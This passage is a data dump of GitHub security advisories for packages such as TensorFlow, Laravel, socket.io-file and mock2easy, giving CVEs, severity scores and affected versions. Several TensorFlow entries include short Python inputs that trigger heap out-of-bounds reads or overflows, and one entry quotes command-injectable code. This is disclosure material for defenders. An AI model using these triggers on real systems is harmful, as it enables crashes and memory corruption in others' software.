'https://snyk.io/vuln/SNYK-JS-TRIM-1017038'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T17:44:44Z', 'nvd_published_at': '2020-10-27T09:15:00Z'}" +1.4.0,GHSA-w68r-5p45-5rqp,2021-05-04T22:46:50Z,2021-05-06T18:54:20Z,,['CVE-2020-24941'],Improper Input Validation in Laravel,An issue was discovered in Laravel before 6.18.35 and 7.x before 7.24.0. The $guarded property is mishandled in some situations involving requests with JSON column nesting expressions.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.18.35'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.24.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24941'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/commit/897d107775737a958dbd0b2f3ea37877c7526371'}, {'type': 'WEB', 'url': 'https://blog.laravel.com/security-release-laravel-61835-7240'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:46:50Z', 'nvd_published_at': '2020-09-04T02:15:00Z'}" +1.4.0,GHSA-r2gr-fhmr-66c5,2021-04-21T21:00:03Z,2021-05-10T18:38:11Z,,['CVE-2020-24807'],"""Arbitrary code execution in socket.io-file""","""The socket.io-file package through 2.0.31 for Node.js relies on client-side validation of file types, which allows remote attackers to execute arbitrary code by uploading an executable file via a modified JSON name field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'socket.io-file'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24807'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-6495-8jvh-f28x'}, {'type': 'WEB', 'url': 'https://github.com/rico345100/socket.io-file'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1564'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/socket.io-file'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T21:00:03Z', 'nvd_published_at': '2020-10-06T18:15:00Z'}" +1.4.0,GHSA-p9f8-gqjf-m75j,2021-05-26T20:05:47Z,2021-05-06T17:28:36Z,,['CVE-2020-8136'],Uncontrolled Resource Consumption in fastify-multipart,Prototype pollution vulnerability in `fastify-multipart` < 1.0.5 allows an attacker to crash fastify applications parsing multipart requests by sending a specially crafted request.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'fastify-multipart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8136'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/804772'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T22:07:09Z', 'nvd_published_at': '2020-03-20T19:15:00Z'}" +1.4.0,GHSA-g636-q5fc-4pr7,2021-05-21T22:11:53Z,2021-05-24T17:00:27Z,,[],accounts: Hash account number using Salt,"@alovak found that currently when we build hash of account number we do not ""salt"" it. Which makes it vulnerable to rainbow table attack. + +**What did you expect to see?** +I expected salt (some random number from configuration) to be used in [hash.AccountNumber](https://github.com/moov-io/customers/blob/master/pkg/secrets/hash/account_number.go#L13) + +I would generate salt per tenant at least (maybe per organization).",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/moov-io/customers'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/moov-io/customers/security/advisories/GHSA-g636-q5fc-4pr7'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T22:11:53Z', 'nvd_published_at': None}" +1.4.0,GHSA-cf2x-rqc8-grfq,2021-04-19T22:44:18Z,2021-05-10T19:16:27Z,,['CVE-2020-7767'],Regular expression deinal of service in express-validators,All versions of package express-validators are vulnerable to Regular Expression Denial of Service (ReDoS) when validating specifically-crafted invalid urls.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'express-validators'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7767'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-EXPRESSVALIDATORS-1017404'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T22:44:18Z', 'nvd_published_at': '2020-11-11T11:15:00Z'}" +1.4.0,GHSA-m8fm-mv5w-33pv,2022-07-05T18:00:21Z,2021-05-06T15:52:59Z,,['CVE-2021-23375'],Command Injection in psnode,"This affects all current versions of package psnode. If attacker-controlled user input is given to the kill function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'psnode'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23375'}, {'type': 'PACKAGE', 'url': 'https://github.com/nrako/psnode'}, {'type': 'WEB', 'url': 'https://github.com/nrako/psnode/blob/076f623689e4506d3647505daca13b3f482e0c31/lib/index.js#23L59'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PSNODE-1078543'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/psnode'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T21:25:43Z', 'nvd_published_at': '2021-04-18T19:15:00Z'}" +1.4.0,GHSA-545v-42p7-98fq,2021-05-18T18:54:55Z,2021-05-21T14:25:25Z,,['CVE-2021-29570'],Heap out of bounds read in `MaxPoolGradWithArgmax`,"### Impact +The implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: + +```python +import tensorflow as tf + +input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) +grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) +argmax = tf.constant([1], shape=[1], dtype=tf.int64) +ksize = [1, 1, 1, 1] +strides = [1, 1, 1, 1] + +tf.raw_ops.MaxPoolGradWithArgmax( + input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, + padding='SAME', include_batch_in_index=False) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/ef0c008ee84bad91ec6725ddc42091e19a30cf0e/tensorflow/core/kernels/maxpooling_op.cc#L1016-L1017) uses the same value to index in two different arrays but there is no guarantee that the sizes are identical. + +### Patches +We have patched the issue in GitHub commit [dcd7867de0fea4b72a2b34bd41eb74548dc23886](https://github.com/tensorflow/tensorflow/commit/dcd7867de0fea4b72a2b34bd41eb74548dc23886). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-545v-42p7-98fq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29570'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/dcd7867de0fea4b72a2b34bd41eb74548dc23886'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T18:54:55Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-jvf4-g24p-2qgw,2023-09-07T18:56:23Z,2021-05-10T18:37:34Z,,['CVE-2020-7738'],Arbitrary Code Execution in shiba,"All versions of package shiba are vulnerable to Arbitrary Code Execution due to the default usage of the function `load()` of the package js-yaml instead of its secure replacement , `safeLoad()`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'shiba'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7738'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SHIBA-596466'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/shiba'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-22T22:20:49Z', 'nvd_published_at': '2020-10-02T10:15:00Z'}" +1.4.0,GHSA-jfp7-4j67-8r3q,2021-05-18T23:06:25Z,2021-05-21T14:22:05Z,,['CVE-2021-29529'],Heap buffer overflow caused by rounding,"### Impact +An attacker can trigger a heap buffer overflow in `tf.raw_ops.QuantizedResizeBilinear` by manipulating input values so that float rounding results in off-by-one error in accessing image elements: + +```python +import tensorflow as tf + +l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] +images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) +size = tf.constant([12, 6], shape=[2], dtype=tf.int32) +min = tf.constant(80.22522735595703) +max = tf.constant(80.39215850830078) + +tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, + align_corners=True, half_pixel_centers=True) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/44b7f486c0143f68b56c34e2d01e146ee445134a/tensorflow/core/kernels/quantized_resize_bilinear_op.cc#L62-L66) computes two integers (representing the upper and lower bounds for interpolation) by ceiling and flooring a floating point value: + +```cc +const float in_f = std::floor(in); +interpolation->lower[i] = std::max(static_cast(in_f), static_cast(0)); +interpolation->upper[i] = std::min(static_cast(std::ceil(in)), in_size - 1); +``` + +For some values of `in`, `interpolation->upper[i]` might be smaller than `interpolation->lower[i]`. This is an issue if `interpolation->upper[i]` is capped at `in_size-1` as it means that `interpolation->lower[i]` points outside of the image. Then, [in the interpolation code](https://github.com/tensorflow/tensorflow/blob/44b7f486c0143f68b56c34e2d01e146ee445134a/tensorflow/core/kernels/quantized_resize_bilinear_op.cc#L245-L264), this would result in heap buffer overflow: + +```cc +template +inline void OutputLerpForChannels(const InterpolationCache& xs, + const int64 x, const T_SCALE ys_ilerp, + const int channels, const float min, + const float max, const T* ys_input_lower_ptr, + const T* ys_input_upper_ptr, + T* output_y_ptr) { + const int64 xs_lower = xs.lower[x]; + ... + for (int c = 0; c < channels; ++c) { + const T top_left = ys_input_lower_ptr[xs_lower + c]; + ... + } +} +``` + +For the other cases where `interpolation->upper[i]` is smaller than `interpolation->lower[i]`, we can set them to be equal without affecting the output. + +### Patches +We have patched the issue in GitHub commit [f851613f8f0fb0c838d160ced13c134f778e3ce7](https://github.com/tensorflow/tensorflow/commit/f851613f8f0fb0c838d160ced13c134f778e3ce7). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-jfp7-4j67-8r3q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29529'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f851613f8f0fb0c838d160ced13c134f778e3ce7'}]","{'cwe_ids': ['CWE-131', 'CWE-193'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:06:25Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-g4xj-wcq6-qwx5,2023-09-08T19:29:12Z,2021-05-06T18:25:58Z,,['CVE-2020-7697'],Code injection in mock2easy,"This affects all versions up to and including version 0.0.24 of package mock2easy. a malicious user could inject commands through the `_data` variable: + +Affected Area + +```js +require('../server/getJsonByCurl')(mock2easy, function(error, stdout) { + if (error) { + return res.json(500, error); + } + res.json(JSON.parse(stdout)); +}, '', _data.interfaceUrl, query, _data.cookie, _data.interfaceType);```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mock2easy'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7697'}, {'type': 'WEB', 'url': 'https://github.com/appLhui/mock2easy/blob/1da728fa0f61cc29fb415f0677e54ad4902261d3/routes/index.js#L132-L139'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MOCK2EASY-572312'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/mock2easy'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T18:23:33Z', 'nvd_published_at': '2020-07-29T13:15:00Z'}" +1.4.0,GHSA-792r-mh2q-p8qp,2021-03-31T23:22:17Z,2021-05-13T22:30:52Z,,['CVE-2021-26715'],Server Side Request Forgery (SSRF) in org.mitre:openid-connect-server,"The OpenID Connect server implementation for MITREid Connect through 1.3.3 contains a Server Side Request Forgery (SSRF) vulnerability. The vulnerability arises due to unsafe usage of the logo_uri parameter in the Dynamic Client Registration request. An unauthenticated attacker can make a HTTP request from the vulnerable server to any address in the internal network and obtain its response (which might, for example, have a JavaScript payload for resultant XSS). The issue can be exploited to bypass network boundaries, obtain sensitive data, or attack other hosts in the internal network.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.mitre:openid-connect-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26715'}, {'type': 'WEB', 'url': 'https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/releases'}, {'type': 'WEB', 'url': 'https://portswigger.net/research/hidden-oauth-attack-vectors'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T18:51:24Z', 'nvd_published_at': '2021-03-25T09:15:00Z'}" +1.4.0,GHSA-cwv3-863g-39vx,2021-05-18T16:46:07Z,2021-05-21T14:26:56Z,,['CVE-2021-29591'],Stack overflow due to looping TFLite subgraph,"### Impact +TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls. + +For example, the [`While` implementation](https://github.com/tensorflow/tensorflow/blob/106d8f4fb89335a2c52d7c895b7a7485465ca8d9/tensorflow/lite/kernels/while.cc) could be tricked into a scneario where both the body and the loop subgraphs are the same. Evaluating one of the subgraphs means calling the `Eval` function for the other and this quickly exhaust all stack space. + +### Patches +We have patched the issue in GitHub commit [9c1dc920d8ffb4893d6c9d27d1f039607b326743](https://github.com/tensorflow/tensorflow/commit/9c1dc920d8ffb4893d6c9d27d1f039607b326743) (for the `While` operator) and in GitHub commit [c6173f5fe66cdbab74f4f869311fe6aae2ba35f4](https://github.com/tensorflow/tensorflow/commit/c6173f5fe66cdbab74f4f869311fe6aae2ba35f4) (in general). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cwv3-863g-39vx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29591'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/9c1dc920d8ffb4893d6c9d27d1f039607b326743'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/c6173f5fe66cdbab74f4f869311fe6aae2ba35f4'}]","{'cwe_ids': ['CWE-674', 'CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T16:46:07Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-36fm-v9wv-56jf,2023-09-07T12:00:28Z,2021-05-06T18:54:04Z,,['CVE-2020-10596'],Cross-site Scripting in OpenCart,OpenCart 3.0.3.2 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'opencart/opencart'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10596'}, {'type': 'WEB', 'url': 'https://github.com/opencart/opencart/issues/7810'}, {'type': 'PACKAGE', 'url': 'https://github.com/myopencart/ocStore'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/157908/OpenCart-3.0.3.2-Cross-Site-Scripting.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T21:30:17Z', 'nvd_published_at': '2020-03-17T15:15:00Z'}" +1.4.0,GHSA-59q2-x2qc-4c97,2021-05-18T20:27:11Z,2021-05-21T14:24:54Z,,['CVE-2021-29559'],Heap OOB access in unicode ops,"### Impact +An attacker can access data outside of bounds of heap allocated array in `tf.raw_ops.UnicodeEncode`: + +```python +import tensorflow as tf + +input_values = tf.constant([58], shape=[1], dtype=tf.int32) +input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) +output_encoding = ""UTF-8"" + +tf.raw_ops.UnicodeEncode( + input_values=input_values, input_splits=input_splits, + output_encoding=output_encoding) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/472c1f12ad9063405737679d4f6bd43094e1d36d/tensorflow/core/kernels/unicode_ops.cc) +assumes that the `input_value`/`input_splits` pair specify a valid sparse tensor. + +### Patches +We have patched the issue in GitHub commit [51300ba1cc2f487aefec6e6631fef03b0e08b298](https://github.com/tensorflow/tensorflow/commit/51300ba1cc2f487aefec6e6631fef03b0e08b298). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-59q2-x2qc-4c97'}, {'type': 'ADVISORY', 'url': 